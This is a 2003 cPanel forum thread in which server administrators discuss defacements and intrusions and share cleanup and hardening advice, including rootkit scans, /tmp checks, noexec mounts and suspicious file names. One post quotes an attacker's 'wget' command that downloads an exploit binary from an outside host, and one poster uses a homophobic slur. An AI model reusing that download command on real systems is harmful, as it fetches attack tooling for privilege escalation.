cPanel Forums

Diatone · #16 (**permalink**) 12-24-2003, 12:49 AM

http://www.delta5.com.br/mirror/topdefacer/

Those are the fags who got all of us... Trust me. Little HACKING COMPETITION> WOOO HOO FUN STUFF. I want to meet them face to face and see what the punk script kiddies have to say.

compunet2 · #17 (**permalink**) 12-24-2003, 01:42 AM

Most likely nothing you can do. See: http://grc.com/dos/grcdos.htm
I also had the same thing with TechTeam changing all the index files. I have since upgraded the kernel, changed the permission on the /tmp directory, removed compilers, and blocked their IP range, but would still like to know exactly how they did it, or if any of this would have stopped them. Also, how did you find out so much information about them anyway? Maybe you should make the info public, and see how they like it... lol

ivaserver · #18 (**permalink**) 12-24-2003, 04:17 AM

my server provider killed the processes that were started by the hackers. This included a Half-Life server, an ircd and several unknown programs

ivaserver · #19 (**permalink**) 12-24-2003, 06:13 AM

deleted

B12Org · #20 (**permalink**) 12-29-2003, 03:47 PM

Quote:

Originally posted by brumie
oh yes just delete that uid
i seen that too and delete the user line:
pico /etc/passwd

but believe it or not there must be hidden process
run chkrootkit (search on this forum on how to install it)
also check on tmp

cd /tmp
ls -la

find weird unussual files/directory there
but it'll be good if u releod the OS and get kernel update and find some threads about securing whm/cpanel, i found it very usefull

What counts as wierd or unusal files/dirs?

brumie · #21 (**permalink**) 12-29-2003, 10:59 PM

Quote:

What counts as wierd or unusal files/dirs?

files are excutebale

on the xmas day, my friend's server almost got hack
u should check that weird file:

so far we found this kind of files on several servers /tmp:
.xcgi
r00t
w00t
xp
xmas
gift
r0nin
anyname.c --> cc code compile able

i'm sure there must be lots way they trying to hack
sometimes they also mk directory name pretending like it was a session files

-rw------- 1 nobody nobody 0 Dec 29 10:51 sess_f7139ec439e5ad737c9c22723b140123
drwxr-xr-x 2 nobody nobody 4096 Dec 29 16:41 sess_f7139ec439e5ad737c9c22723b140xxx
-rw------- 1 nobody nobody 435 Dec 28 23:42 sess_fa205a6f3a4b7a5d3a3affb915522456

see the permission drwxr-xr-x
that's directory, the man that got our server was did with that way, i can't believe when i'm enter that directory and found many executable files there

anyway that was little story of my nightmares, i'm moving to another provider that helped me lots securing my box and watching like hawk

oh yeah i can sleep better....

suggestion: search thread on this forum about secure your box

set tmp with noexec:
http://forums.ev1servers.net/showthr...threadid=27771

correct me if i'm wrong

B12Org · #22 (**permalink**) 12-30-2003, 12:34 AM

Oh, ok. I wasnt sure if you meant obviously unusual files, or computer nerd obvious. Thanks.

micron · #23 (**permalink**) 12-30-2003, 06:51 AM

Quote:

Originally posted by brumie

Code:

... wget www.viperhaxu.hpg.com.br/ptrace ...

Here are your hackers. Looks like 13 year olds.

B12Org · #24 (**permalink**) 12-30-2003, 09:29 AM

That file that you referenced is empty text file. Looks like whatever it was, its gone now. My experience was with a group calling themselves "techteam". Some hackers they were, they had to make their web page with frontpage

mc303 · #25 (**permalink**) 04-29-2004, 12:00 PM

excellent resource of knowledge
Thank you

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode